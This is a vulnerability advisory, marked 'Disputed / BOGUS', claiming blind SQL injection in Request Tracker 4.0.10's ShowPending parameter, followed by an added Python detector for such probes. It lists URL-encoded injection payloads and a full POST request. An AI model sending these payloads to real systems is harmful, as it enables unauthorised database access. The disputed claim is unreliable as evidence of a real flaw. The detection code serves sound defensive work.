Bogus: RT: Request Tracker 4.0.10 SQL Injection ( Ascii Version )


Disputed / BOGUS
RT: Request Tracker 4.0.10 SQL Injection

Published / (Updated): 2013-04-11 / 2013-12-23
Credit: cheki
Risk: Medium
CWE: CWE-89
CVE: CVE-2013-3525
Local: No
Remote: Yes

CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: - SQL-Injection - RT: Request Tracker System
# Date: 10/05/2013
# Exploit Author: cheki
# Vendor Homepage: http://bestpractical.com/rt/
# Version: RT 4.0.10
# Tested on: Kali Linux

############################################
URL: http://10.10.10.70/Approvals/
Entity: ShowPending (Parameter) 
Risk: It is possible to view, modify or delete database entries and tables
Causes: Sanitization of hazardous characters was not performed correctly on user input
Fix: Review possible solutions for hazardous character injection

#Description: Blind SQL Injection: append Boolean True/False string expressions, using apostrophes and commenting out the rest of the query.
#The following changes were applied to the original request:
1) Set parameter 'ShowPending's value to '1%27+and+%27f%27%3D%27f%27%29+--+'
2) Set parameter 'ShowPending's value to '1%27+and+%27b%27%3D%27f%27%29+--'
3) Set parameter 'ShowPending's value to '1%27+or+%27b%27%3D%27f%27%29+--'


POST /Approvals/ HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Cookie: RT_SID_example.com.80=7c120854a0726239b379557f024cc1cb
Accept-Language: en-US
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://10.10.10.70/Approvals/
Host: 10.10.10.70
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Length: 120

ShowPending=1%27+and+%27f%27%3D%27f%27%29+--+&ShowResolved=1&ShowRejected=1&ShowDependent=1&CreatedBefore=&CreatedAfter=

###############################################
Reasoning: The test result seems to indicate a vulnerability because it shows that values can be appended to parameter values, indicating that they were embedded in an SQL query.
In this test, three (or sometimes four) requests are sent. The last is logically equal to the original, and the next-to-last is different. Any others are for control purposes. A comparison of the last two responses with the first (the last is similar to it, and the next-to-last is different) indicates that the application is vulnerable.
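For triage on the receiving side, the true/false probe set described above leaves a recognizable trace in request logs. The following is an added example, not part of the original advisory or of RT: it decodes form bodies and flags a parameter that receives both an always-true and an always-false quoted comparison. The function names and the benign sample body are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl

# A quote, AND/OR, two quoted literals compared with '=', an optional ')',
# then a trailing SQL comment: the shape of the payloads listed in the advisory.
PROBE = re.compile(
    r"'\s*(?P<op>and|or)\s+'(?P<lhs>[^']*)'\s*=\s*'(?P<rhs>[^']*)'\s*\)?\s*--",
    re.IGNORECASE,
)

def classify_probes(body):
    """Return [(param, operator, 'true'|'false')] for each probe in a form body."""
    findings = []
    # parse_qsl decodes %27 to ' and + to a space before the pattern is applied.
    for name, value in parse_qsl(body, keep_blank_values=True):
        m = PROBE.search(value)
        if m:
            truth = "true" if m.group("lhs") == m.group("rhs") else "false"
            findings.append((name, m.group("op").lower(), truth))
    return findings

def is_differential_set(bodies):
    """True when one parameter is sent both a true and a false comparison,
    which is the request pattern of an automated blind-SQLi check."""
    seen = {}
    for body in bodies:
        for name, _op, truth in classify_probes(body):
            seen.setdefault(name, set()).add(truth)
    return any({"true", "false"} <= truths for truths in seen.values())

# Constructed sample: the three ShowPending values from the advisory,
# plus a benign body (assumed) for contrast.
TAIL = "&ShowResolved=1&ShowRejected=1&ShowDependent=1&CreatedBefore=&CreatedAfter="
SAMPLE_BODIES = [
    "ShowPending=1%27+and+%27f%27%3D%27f%27%29+--+" + TAIL,
    "ShowPending=1%27+and+%27b%27%3D%27f%27%29+--" + TAIL,
    "ShowPending=1%27+or+%27b%27%3D%27f%27%29+--" + TAIL,
]
BENIGN_BODY = "ShowPending=1" + TAIL

if __name__ == "__main__":
    for b in SAMPLE_BODIES + [BENIGN_BODY]:
        print(classify_probes(b))
    print("differential probe set:", is_differential_set(SAMPLE_BODIES))
```

A hit shows only that a scanner-style probe was sent; it says nothing about whether the application's responses actually depended on the injected expression.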


Home Page: securitylabnews.blogspot.com
